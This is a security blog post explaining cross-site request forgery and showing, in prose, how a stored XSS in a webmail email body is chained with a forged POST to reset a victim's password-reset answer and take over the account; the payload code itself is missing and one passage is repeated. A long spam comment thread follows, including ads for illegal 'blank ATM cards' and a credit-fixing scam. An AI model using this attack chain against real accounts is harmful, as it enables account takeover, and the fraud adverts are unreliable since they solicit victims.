Cross Site Request Forgery
Cross Site Request Forgery (CSRF) is an attack where an attacker can trick a user's browser into performing actions on the attacker's behalf. This has the added benefit of taking advantage of the user's authentication. The archetypal example of CSRF is to imagine that if a bank customer wanted to transfer funds, they would have to visit a specific URL such as, http://bank.com/?transfer.php?to=hacker_acct&amount=1000. Then, all the attacker would have to do is trick people into clicking a link for that URL so that the victim's browser performs a GET and, if the victim happens to be logged into that bank, the victim will unknowingly transfer money to that attacker. The web application is going to assume that the user is in full control of its own actions and will execute the transfer. CSRF is about exploiting the trust that the web application has in the user's browser. You can read more about CSRF here.
CSRF Mitigation
The majority of CSRF mitigation strategies revolve around some sort of nonce being associated with the request being made. That can mean that instead of a dumb URL such as http://bank.com/?transfer.php?to=hacker_acct&amount=1000, you would have http://bank.com/usersession-1234?transfer.php?to=hacker_acct&amount=1000 so that the attacker could not generate the link ahead of time. Another example of this when performing a POST is to add a hidden field set to a nonce. This token will get passed along when the user hits the submit button and the server will check that the nonce it set for that form is what was submitted. Like before, this nonce can't be pre-generated, and thus an attacker is unable to create a dumb link to trick users with. Here is what a CSRF token looks like:That token prevents us from hard coding a POST to the URL since the value of that token should change each and every time the form is loaded.
Mitigating CSRF Mitigations
With these tokens and nonces making the URL or parameters unique, CSRF should pretty much be resolved because the attacker is not able to perform any actions right? Not quite. Let's review what XSS provides for us. XSS allows an attacker to run a script on a victim's browser. The victim's browser is going to trust that the script is safe and will execute, no questions asked. We can use an XSS vulnerability to execute code that will gather the necessary information to overcome the CSRF protections in place. In other words we use the XSS vulnerability to determine what the specific session information or token is, incorporate that into a CSRF attack, and proceed as a normal.
Putting It All Together
Let's go back to a previous post. What we had there was a XSS vulnerability in the body of an email. With that in mind, let's go looking around the web application a little more to see what we can find. Within the Advanced Options, we see that there is an option to configure the password reset question, answer, and a checkbox to enable the feature at all.
Let's go fill this out, hit submit, and trap the request with a Firefox plugin, named Tamper Data, that the browser makes so we know what we have to replicate.
Here we see the POST that is made once we update these values and hit Save:
Tamper Data is showing us on the right hand side all of the parameters that are being passed to the URL. Of particular interest, we see that enabling the password reset question corresponds to the usepassresetting parameter having a value of checkbox and you can also see the URL encoded password reset question and the password reset answer. The other parameters are important as well and will play a part later.
The other important thing to realize is that another parameter that gets passed along is the id parameter that has a value of 333n487v6y1sJjJ0GFnzPsID8oKJBfmEZeyk20140130002922. If you log in and out a few times you will come to notice that this is probably a random value. I did not expend any time doing a statistical analysis with Burp to verify this but I assumed it was. This id parameter is what will stop us from being able to hardcode a POST to _processaccountoptions with usepassresetting set to checkbox and passresetanswer set to whatever we want. Fortunately, we can get around this thanks to the XSS vulnerability we have in our backpocket.
The flow of the attack will go as follows, the victim opens an email with JavaScript embedded in the body of the email. This JavaScript snippet will call a piece of JavaScript on the attacker's server that will:
- Parse out the value of the id parameter in the URL of the victim's browser
- Use that id parameter value and complete the POST request to set the victim's password reset question.
Now, we will send an email to the victim with this embedded into the body of the email:
That will then call this piece of JavaScript that will be on the attacker's server:
This script will first grab the URL and then proceed to parse out the value of the id parameter by performing a substring. Next, it then calls the passwordReset function and that will piece together the parameters necessary to perform a proper POST to the _processaccountoptions URL. Notice that this sets the usepassresetting, passresetquestions, and passresetanswer.
This should be enough to bypass the randomly generated id and if everything works, when a user opens the malicious email they will unknowingly enable the password reset feature and set their password reset answer to whatever the attacker chose. This will then allow the attacker to set a user's password by using the password reset feature.
Thus when the user opens the email the attacker can:
This script will first grab the URL and then proceed to parse out the value of the id parameter by performing a substring. Next, it then calls the passwordReset function and that will piece together the parameters necessary to perform a proper POST to the _processaccountoptions URL. Notice that this sets the usepassresetting, passresetquestions, and passresetanswer.
This should be enough to bypass the randomly generated id and if everything works, when a user opens the malicious email they will unknowingly enable the password reset feature and set their password reset answer to whatever the attacker chose. This will then allow the attacker to set a user's password by using the password reset feature.
Thus when the user opens the email the attacker can:
- Go to the webmail login screen and click the Forgot your password? link
- Enter the victim's email address
- And we should see that the victim will have their password reset question set to what we set it to be in our script, "Hacked via XSS"
- From there the attacker can input the answer to the question as, 'h4cked', and then set a new password for the user. Heck, you could probably do step 3 and 4 by extended the script to do another CSRF POST to save you the manual effort.
I hope this post helped describe what CSRF is and what it allows you to do and just how powerful XSS can be and how its impact can be much more than just dumping cookies and throwing alert boxes.
Thanks Admin for sharing such a useful post, I hope it’s useful to many individuals for whose looking this precious information to developing their skill.
ReplyDeleteRegards,
PHP Training in Chennai|PHP Course in Chennai
دانلود آهنگ سامان جلیلی قبول کن
DeleteToken have a useful part to play.
ReplyDeleteThis is a great inspiring article.I am pretty much pleased with your good work.You are posting really very helpful information. Keep it up. Keep blogging.
ReplyDeleteFinal Year Project Center in Chennai | Final Year Project Center in Velachery
This is really great work and very interesting article thanks for sharing TNPSC Coaching Centre in Chennai
ReplyDeleteReally Good blog post.provided a helpful information.I hope that you will post more updates like this.
ReplyDeleteAWS Training in HRBR Layout
AWS Training in Kalyan Nagar
Best AWS Training Institute in Kalyan Nagar Bangalore
I believe there are many more pleasurable opportunities ahead for individuals that looked at your site.
ReplyDeleteBest Hadoop Training Institute in chennai
Very interesting post, it was too good and good job. Thanks for your sharing with us. I am waiting for your great post.
ReplyDeleteIELTS coaching in Chennai
IELTS coaching centre in Chennai
IELTS Training in Chennai
Best IELTS coaching in Chennai
Best IELTS coaching centres in Chennai
Informative Blog, Thank you to share this
ReplyDeleteRegards,
PHP Training in Chennai
Attend The Python Training in Bangalore From ExcelR. Practical Python Training in Bangalore Sessions With Assured Placement Support From Experienced Faculty. ExcelR Offers The Python Training in Bangalore.
ReplyDeleteThe article is so informative. This is more helpful for our
ReplyDeleteBest online software testing training course institute in chennai with placement
Best selenium testing online course training in chennai
Learn best software testing online certification course class in chennai with placement
Thanks for sharing.
You have an informative blog. I’ve learned something from it
ReplyDeleteTnpsc Coaching Centre
Best Tnpsc Coaching Centre in Chennai
Tnpsc Current Affairs
Great Post. It was very informative and keep sharing. Home Lift India
ReplyDeleteGreat post i must say and thanks for the information. Education is definitely a sticky subject. However, is still among the leading topics of our time. I appreciate your post and look forward to more.
ReplyDeletedata analytics course
I still can not understand where do I have to type these codes? It all seems very complicated to me. I would be very grateful, if someone told me.
ReplyDeleteGerman Classes In Bangalore
ReplyDeleteThe information given in this blog is very nice and i like it if you share more this kind of blog and i also have written this kind of blog you can also read for more knowledge.
php developer interview questions
ReplyDeleteImportant PHP and MySQL Interview Questions and Answers for freshers and experienced to get your dream job in PHP! Basic & Advanced PHP Interview Questions for Freshers & Experienced.
interview questions node js
ReplyDeleteImportant Node JS Interview Questions and Answers for freshers and experienced to get your dream job & Advanced Node.JS Interview Questions for Freshers & Experienced.
This blog is really nice and informative blog, The explanation given is really comprehensive and informative.
ReplyDeleteangularjs interview questions
angularjs interview questions and answers
angularjs interview questions and answers pdf
php interview questions and answers
php interview questions for freshers
salesforce interview questions
salesforce developer interview questions
software testing interview question and answer
Nice blog was really feeling good to read it. Thanks for this information.
ReplyDeletesoftware testing interview question and answer
software testing interview questions and answers for experienced
software testing interview questions and answers pdf
angularjs interview questions for experienced
angularjs interview questions
angularjs interview questions and answers for experienced
software testing interview question and answer
software testing interview questions and answers for experienced
More valuable post!!! Thanks for sharing this great post with us.
ReplyDeletenodejs interview questions and answers
node js interview questions medium
interview questions nodejs
rpa interview questions and answers for experienced
angularjs interview questions
angularjs interview questions and answers for experienced
php interview questions and answers
This Information Very Helpful to everyone
ReplyDeletedevops interview questions and answers
devops interview questions and answers for experienced
java interview questions for freshers
selenium interview questions and answers pdf download
digital marketing interview questions and answers for freshers
hadoop interview questions and answers pdf
oracle pl sql interview questions
This blog is really nice and informative blog, The explanation given is really comprehensive and informative.
ReplyDeletesalesforce interview questions
salesforce developer interview questions
salesforce integration interview questions
rpa interview questions and answers for experienced
angularjs interview questions
angularjs interview questions and answers for experienced
php interview questions and answers
This is good site and nice point of view.I learnt lots of useful information.
ReplyDeletehacking books
java interview questions and answers
selenium interview questions and answers
digital marketing interview questions and answers
hadoop interview questions and answers
oracle interview questions
data science interview questions and answers
Great experience for me by reading this blog. Thank you for the wonderful article.
ReplyDeleteselenium interview questions and answers
selenium interview questions and answers for experienced
java interview questions and answers
digital marketing interview questions and answers
hadoop interview questions and answers
oracle interview questions
data science interview questions and answers
it was so good to read and useful
ReplyDeletepython interview questions and answers for experienced
data scientist interview questions and answers pdf
aws interview questions and answers
devops interview questions and answers
pega basic interview questions
java interview questions and answers
Nice post, I like to read this blog. It is very interesting to read.
ReplyDeletemachine learning in artificial intelligence
what is reactjs used for
amazon web servers
angularjs development company
aws interview questions and answers for freshers pdf
aws interview questions and answers for devops
I am Leah Hart I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from united hacking company blank ATM card that can withdraw $5,500 daily. I got it from him last week and now I have withdrawn about $15,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met united hacking company because I met Five persons before him and they could not help me. But am happy now united hacking company sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to the united hacking company because he changed my story all of a sudden. The card works in all countries that is the good news contact. email address: unitedblankatmhackcard@gmail.com
ReplyDeleteMua vé tại đại lý vé máy bay Aivivu, tham khảo
ReplyDeleteđặt vé máy bay từ hàn quốc về việt nam
vé máy bay giá rẻ đến hà nội
đặt vé máy bay thanh hóa sài gòn
vé máy bay nha trang giá rẻ
cách đăng ký chuyến bay từ mỹ về việt nam
Helpful post. Thanks for sharing.
ReplyDeleteSpoken English training Online
React JS course
Sales force course in Chennai
This information is impressive. I am inspired with your post writing style & how continuously you describe this topic. Eagerly waiting for your new blog keep doing more.
ReplyDeleteSelenium Coaching
QTP Training Institute
IOS Training Institute
Wonderful blog.Thanks for sharing such a useful information..
ReplyDeletePHP Training in Chennai
PHP Certification Online
PHP Training in Bangalore
Really Superb! Thanks for sharing this useful information.
ReplyDeleteFarina Hair Care
Thanks for sharing this.. Really usefull blog.
ReplyDeleteChill Bro Bala
I feel happy to say this I have learnt new things from your blog and it’s really useful for me, keep sharing valuable information regularly.
ReplyDeleteRamakrishnan Interview
Awesome blog. Thank you for sharing such a useful information.
ReplyDeleteDharsha Gupta Interview
Your blog is very interesting to read and easy to understand. Keep on blogging.
ReplyDeleteActress Monika Interview
Thanks for sharing the nice article, keep updating news article.
ReplyDeleteChill Bro Bala
I recently read your post and I got a lot of information. Keep on sharing more blogs like this.
ReplyDeleteMilla Exclusive Interview
Thank you for allowing me to read it, welcome to the next in a recent article.
ReplyDeleteDharsha Gupta
Your website is really cool and this is a great inspiring article.
ReplyDeleteSam Anderson
Your blog is very easy to understand many concepts and I got a lot of information.Thanks for sharing.
ReplyDeleteYamuna Chinnadurai Interview
Best article.Thanks for sharing this.
ReplyDeleteKavin
This blog is very useful for me to understand the information.Keep on blogging.
ReplyDeleteDharsha Gupta Emotional
Thanks for your informative article. Keep on sharing.
ReplyDeleteKuhasini Interview
I got to favourite this web site it seems very useful very beneficial
ReplyDeleteTheni Eswar
Thanks for your informative blog. Keep on sharing.
ReplyDeleteLocal Body Election 2021 Live
Very nice piece of information, please keep updating and share your valuable information with us.
ReplyDeleteMime Gopi
Really awesome Blog.Thanks for sharing this.
ReplyDeleteSakthi Chidambaram
Excellent blog! So many ideas in a single site. Thanks for the informative article. Keep updating more article.
ReplyDeleteJeeva Subramaniyam
Best blog i had ever read.Thanks for sharing this.
ReplyDeleteBigg Boss 5 Tamil Live
This blog is a great source of information which is very useful for me. Keep sharing more article like this.
ReplyDeleteMilla Babygal
Excellent blog. Thanks for sharing such a useful information. Keep on blogging.
ReplyDeleteTn Local Body Election 2021
Thanks for your informative article.
ReplyDeleteFake Blood in Movies
This comment has been removed by the author.
ReplyDeleteVery informative article. Thanks for posting this useful content.
ReplyDeleteYamuna Skincare
Great blog.
ReplyDeleteSundar C
Nice article. The information you give is very interesting.
ReplyDeleteActress Anagha
Really nice blog. thanks for sharing
ReplyDeletebest selenium training in chennai
Best selenium Training Institute in Chennai
Equal Hands has a simple ethos. We relish our time with nature and with each other. The items our makers create reflect this belief.
ReplyDeleteEthical home goods handmade sustainable clothing brands
ethical jewelry brands ecologically sustainable lifestyle brand
Really nice blog. thanks for sharing
ReplyDeletebest java institute in chennai
best java training institute in chennai
This post is so interactive and informative.keep update more information...
ReplyDeleteWeb Designing Course in anna nagar
web designing course in anna nagar chennai
This post is so interactive and informative.keep update more information...
ReplyDeleteDigital Marketing Course in velachery
Digital Marketing Course in Chennai
Thanks a lot for giving us such a helpful information. You can also visit our website for nmims project
ReplyDelete
ReplyDeleteThis post is so interactive and informative.keep update more information...
DevOps course in Tambaram
DevOps Training in Chennai
I’m really happy to say it was an interesting post to read. I learned new information from your article on Bearing , you are doing a great job
ReplyDeleteAre you in need of a credit specialist to help you fix your poor credit? Then I strongly recommend Metronet Credit Solution. I had a very poor credit which made it impossible for me to acquire an auto loan, but my problem was solved when I met Metronet Credit Solution on Reddit. They helped me erase every irregularity and boosted my score to 801, 780 and 775. With our new car life is a lot easier. You can contact them via email: metronetcreditsolution@gmail.com or whatsapp: +16265140620
ReplyDelete